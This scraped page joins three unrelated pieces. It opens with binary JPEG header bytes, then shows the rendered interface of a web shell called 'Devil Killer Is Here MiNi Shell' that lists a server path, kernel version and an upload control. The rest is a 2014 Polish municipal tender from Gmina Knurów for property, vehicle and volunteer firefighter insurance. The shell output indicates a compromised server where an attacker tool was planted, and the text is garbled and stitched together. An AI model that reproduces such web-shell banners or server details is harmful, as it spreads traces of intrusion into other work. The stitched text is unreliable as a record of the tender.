JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140508/99033-N-2014.html

<p class="kh_header"><b>Knurów: Kompleksowe ubezpieczenia majątkowe wraz z odpowiedzialnością cywilną, ubezpieczenia komunikacyjne i ubezpieczenie członków Ochotniczej Straży Pożarnej dla Gminy Knurów</b><br>
<b>Numer ogłoszenia: 99033 - 2014; data zamieszczenia: 08.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Knurów , ul. dr. Floriana Ogana 5, 44-190 Knurów, woj. śląskie, tel. 32 3392308, faks 32 2351521, 3392292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.knurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe ubezpieczenia majątkowe wraz z odpowiedzialnością cywilną, ubezpieczenia komunikacyjne i ubezpieczenie członków Ochotniczej Straży Pożarnej dla Gminy Knurów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje trzy części:
 2. Część nr I - Ubezpieczenia majątkowe wraz z odpowiedzialnością cywilną 
 1) Uog - Ubezpieczenie od ognia i innych zdarzeń losowych,
 2) Ukd - Ubezpieczenie od kradzieży, rabunku i dewastacji,
 3) Ug - Ubezpieczenie wartości pieniężnych - w tym gotówki, papierów wartościowych od kradzieży z włamaniem i rabunek,
 4) Ue - Ubezpieczenie sprzętu elektronicznego,
 5) Ukz - Ubezpieczenie kosztów zabezpieczeń,
 6) Usz - Ubezpieczenie szyb i innych przedmiotów od stłuczenia,
 7) Uoc - Ubezpieczenie odpowiedzialności cywilnej.
 8) Szczegółowy opis przedmiotu zamówienia do części Nr I - określony został w Załączniku nr 1 do SIWZ.
 3. Część nr II - Ubezpieczenia komunikacyjne
 1) Uocp - Ubezpieczenie Odpowiedzialności Cywilnej posiadaczy pojazdów mechanicznych za szkody powstałe w związku z ruchem tych pojazdów,
 2) Uac - Ubezpieczenie Auto Casco, w związku z ruchem i postojem pojazdów,
 3) Unnw - Ubezpieczenie Następstw Nieszczęśliwych Wypadków kierowcy i pasażerów.
 4) Szczegółowy opis przedmiotu zamówienia do części Nr II - określony został w Załączniku Nr 2 do SIWZ.
 4. Część nr III - Ubezpieczenie członków Ochotniczej Straży Pożarnej
 1) Uosp - Ubezpieczenie członków Ochotniczej Straży Pożarnej w związku z udziałem w działaniach ratowniczych, szkoleniach lub ćwiczeniach.
 2) Us - Ubezpieczenie członków Ochotniczej Straży Pożarnej
 3) Szczegółowy opis przedmiotu zamówienia do części Nr III - określony został w Załączniku Nr 3 do SIWZ.
 5. Przedmiot zamówienia został szczegółowo określony w załącznikach do wzorów umów dotyczących poszczególnych części zamówienia.
 6. Wykonawca zobowiązuje się do wykonania usług stanowiących przedmiot umowy dla wybranej części z należytą starannością, przy wykorzystaniu całej posiadanej wiedzy, doświadczenia, kwalifikacji oraz zgodnie z wymaganiami określonymi w załącznikach do umowy stanowiącymi jej integralną część.
 7. Zamawiający nie wyraża zgody na uczestniczenie podwykonawców, w zakresie pośredniczenia w zawieraniu umów ubezpieczeniowych, pośrednikom ubezpieczeniowym określonym w art. 4 ust 1 ustawy z dnia 22 maja 2003 r. o pośrednictwie ubezpieczeniowym

 8. Termin wykonania zamówienia

CZĘŚĆ nr I - Ubezpieczenia majątkowe wraz z odpowiedzialnością cywilną 
i ubezpieczenia komunikacyjne 
 1) Ubezpieczenia od ognia i innych zdarzeń losowych 	09.06.2014r. - 08.06.2016r.
 2) Ubezpieczenia od kradzieży, rabunku i dewastacji 	09.06.2014r. - 08.06.2016r.
 3) Ubezpieczenie wartości pieniężnych, w tym gotówki 
i papierów wartościowych  09.06.2014r. - 08.06.2016r.
 4) Ubezpieczenia sprzętu elektronicznego 	09.06.2014r. - 08.06.2016r.
 5) Ubezpieczenia kosztów naprawy zabezpieczeń 	09.06.2014r. - 08.06.2016r.
 6) Ubezpieczenia szyb i innych przedmiotów od stłuczenia 	09.06.2014r. - 08.06.2016r.
 7) Ubezpieczenia odpowiedzialności cywilnej 	09.06.2014r. - 08.06.2016r.

Część nr II - Ubezpieczenia komunikacyjne 
 1) Ubezpieczenia Odpowiedzialności Cywilnej posiadaczy 
pojazdów mechanicznych za szkody powstałe w związku 
z ruchem tych pojazdów 	w przedziale czasowym: 09.06.2014r. - 08.06.2016r.
 2) Ubezpieczenie Auto Casco 	w przedziale czasowym: 09.06.2014r. - 08.06.2016r.
 3) Ubezpieczenia Następstw Nieszczęśliwych Wypadków 
kierowcy i pasażerów 	w przedziale czasowym: 09.06.2014r. - 08.06.2016r.

CZĘŚĆ nr III - Ubezpieczenie członków Ochotniczej Straży Pożarnej
 1) Ubezpieczenie członków Ochotniczej Straży Pożarnej
w związku z udziałem w działaniach ratowniczych
szkoleniach lub ćwiczeniach 	09.06.2014r. - 08.06.2016r.
 2) Ubezpieczenie członków Ochotniczej Straży Pożarnej 	09.06.2014r. - 08.06.2016r..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający zastrzega sobie możliwość udzielenia zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 6 pzp realizatorowi zamówienia, zgodnych z przedmiotem zamówienia podstawowego i stanowiących nie więcej niż 20% jego wartości, tj.:
 1) ubezpieczenie od ognia i innych zdarzeń losowych, 
 2) ubezpieczenie od kradzieży, rabunku i dewastacji, 
 3) ubezpieczenie wartości pieniężnych - w tym gotówki, papierów wartościowych od kradzieży z włamaniem i rabunek, 
 4) ubezpieczenie sprzętu elektronicznego, 
 5) ubezpieczenie kosztów zabezpieczeń, 
 6) ubezpieczenie szyb i innych przedmiotów od stłuczenia, 
 7) ubezpieczenie odpowiedzialności cywilnej, 
 8) ubezpieczenie Odpowiedzialności Cywilnej posiadaczy pojazdów mechanicznych za szkody powstałe w związku z ruchem tych pojazdów, 
 9) ubezpieczenie Auto Casco, w związku z ruchem i postojem pojazdów, 
 10) ubezpieczenie Następstw Nieszczęśliwych Wypadków kierowcy i pasażerów, 
 11) ubezpieczenie członków Ochotniczej Straży Pożarnej w związku z udziałem w działaniach ratowniczych, szkoleniach lub ćwiczeniach, 
 12) ubezpieczenie członków Ochotniczej Straży Pożarnej. 
 2. Zamówienie, o którym mowa powyżej może zostać udzielone nie później niż w okresie 3 lat od udzielenia zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.21.00-3, 66.51.41.10-0, 66.51.50.00-3, 66.51.51.00-4, 66.51.52.00-5, 66.51.54.00-7, 66.51.60.00-0, 66.51.61.00-1, 66.51.64.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu zostanie spełniony, jeżeli Wykonawca wykaże, że posiada koncesję, zezwolenie lub licencję tj. zezwolenie na prowadzenie działalności ubezpieczeniowej zgodnie z ustawą z dnia 22.05.2003 r. o działalności ubezpieczeniowej.
Dokumenty będą oceniane pod względem: formalno-prawnym, ich aktualności i treści, a także czy informacje w nich zawarte potwierdzają spełnienie wymagań zamawiającego nie później niż na dzień składania ofert. Sposób oceny spełniania warunków wymaganych od wykonawców będzie dokonywany zgodnie z formułą SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania w wykazie usług doświadczenia w wykonaniu lub wykonywaniu należycie, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
 a) w części nr I - co najmniej 1 zlecenia (usługi) na kompleksowe ubezpieczenie majątkowe wraz z odpowiedzialnością cywilną w zakresie porównywalnym z przedmiotem zamówienia przez okres 2 lat o wartości brutto 200 tys. zł, albo co najmniej 2 zleceń (usług) na kompleksowe ubezpieczenie majątkowe wraz z odpowiedzialnością cywilną w zakresie porównywalnym z przedmiotem zamówienia przez okres 1 roku o wartości brutto 100 tys. zł każde,
 b) w części nr II - co najmniej 1 zlecenia (usługi) na ubezpieczenia komunikacyjne w zakresie porównywalnym z przedmiotem zamówienia przez okres 2 lat o wartości brutto 50 tys zł, albo co najmniej 2 zleceń (usług) na ubezpieczenia komunikacyjne w zakresie porównywalnym z przedmiotem zamówienia przez okres 1 roku o wartości brutto 25 tys zł,
 c) w części nr III - co najmniej 1 zlecenia (usługi) na ubezpieczenie członków Ochotniczej Straży Pożarnej w zakresie porównywalnym z przedmiotem zamówienia przez okres 2 lat o wartości 7 tys zł, albo co najmniej 2 zleceń (usług) na ubezpieczenie członków Ochotniczej Straży Pożarnej w zakresie porównywalnym z przedmiotem zamówienia przez okres 1 roku o wartości brutto 3,5 tys zł.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami (wiedzą i do­świadczeniem) niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale) pisem­ne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (wiedzy i doświadczenia) na okres korzystania z nich przy wykonywaniu zamó­wienia.
Zamawiający oceni spełnienie warunku udziału w postępowaniu na podstawie oświadczeń i dokumentów złożonych przez wykonawcę wraz z ofertą, z zastrzeżeniem art. 26 ust 3 i 4. Oświadczenia i dokumenty będą oceniane pod względem: formalno-prawnym, ich aktualności i treści, a także czy informacje w nich zawarte potwierdzają spełnienie wymagań zamawiającego nie później niż na dzień składania ofert. Sposób oceny spełniania warunków wymaganych od wykonawców będzie dokonywany zgodnie z formułą SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku. Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego przez wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z formułą SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wskazania w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia następujących osób:
 a) do części nr I - co najmniej jednej osoby sprzedażowej, uprawnionej do wystawiania polis i co najmniej dwóch osób w zakresie likwidacji szkód - do ubezpieczeń majątkowych i odpowiedzialności cywilnej
 b) do części nr II - co najmniej jednej osoby sprzedażowej, uprawnionej do wystawiania polis i co najmniej jednej osoby w zakresie likwidacji szkód - do ubezpieczeń komunikacyjnych
 c) do części nr III - co najmniej jednej osoby sprzedażowej, uprawnionej do wystawiania polis i co najmniej jednej osoby w zakresie likwidacji szkód - do ubezpieczeń członków Ochotniczej Straży Pożarnej.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował osobami zdolnymi do wykonania zamówienia niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale) pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonywaniu zamówienia.
Zamawiający oceni spełnienie warunku udziału w postępowaniu na podstawie oświadczeń i dokumentów złożonych przez wykonawcę wraz z ofertą, z zastrzeżeniem art. 26 ust 3 i 4. Oświadczenia i dokumenty będą oceniane pod względem: formalno-prawnym, ich aktualności i treści, a także czy informacje w nich zawarte potwierdzają spełnienie wymagań zamawiającego nie później niż na dzień składania ofert. Sposób oceny spełniania warunków wymaganych od wykonawców będzie dokonywany zgodnie z formułą SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku. Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego przez wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z formułą SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dowodami, o których mowa wyżej w pkt. III.4.1 są: 
 a) poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert,
 b) oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa wyżej,
 c) w przypadku, gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie usług, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania ww. dowodów,
 d) zamawiający pod pojęciem głównych usług rozumie usługi określone w rozdz. V ust. 1 pkt. 2 SIWZ.
2. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1 zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym w terminie określonym odpowiednio dla danego dokumentu. 3. Wykonawca polegający na zasobach innego podmiotu na zasadach określonych w art. 26 ust. 2b pzp zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisem­ne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamó­wienia. Gdy dowodem dysponowania zasobami podmiotów trzecich wybranym przez wykonawcę, jest zobowiązanie podmiotu trzeciego, musi ono przybrać formę pisemną i nie jest dopuszczalna inna forma. Jedynie złożenie oryginału dokumentu zawierającego podpis pod treścią oświadczenia osoby uprawnionej do reprezentacji podmiotu trzeciego, spełnia wymóg formy pisemnej zobowiązania, określonej w art. 26 ust. 2b pzp.
4. Wykonawcy, którzy wspólnie ubiegać się będą o udzielenie zamówienia (np. koasekuracja) powinni:
 1) łącznie spełniać warunki udziału w postępowaniu,
 2) żaden z wykonawców występujących wspólnie nie może podlegać wykluczeniu z postępowania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę istotnych postanowień umów zawartych w wyniku niniejszego postępowania w stosunku do treści ofert, na podstawie których dokonano wyboru wykonawców, dla poszczególnych części zamówienia, w następujących okolicznościach:
 1) cena brutto umowy na usługi ubezpieczeniowe ulegnie obniżeniu w przypadku zmniejszenia wartości przedmiotu ubezpieczenia do ubezpieczenia. Rozliczenie składki ubezpieczeniowej nastąpi na podstawie art. 813 kodeksu cywilnego,
 2) w przypadkach wskazanych we wzorach umów stanowiących załączniki do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.knurow.pl/miasto/zamowienia_publiczne.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy w siedzibie zamawiającego-Wydział Zamówień Publicznych, pok. 218, w godz. 8:00-13:30 lub za zaliczeniem pocztowym po uiszczeniu opłaty na konto zam. w wys. 19,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2014 godzina 10:00, miejsce: Urząd Miasta Knurów, ul. dr. F. Ogana 5, 44-190 Knurów, Wydział Zamówień Publicznych, pok. 218, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby uprawnione do kontaktów: 
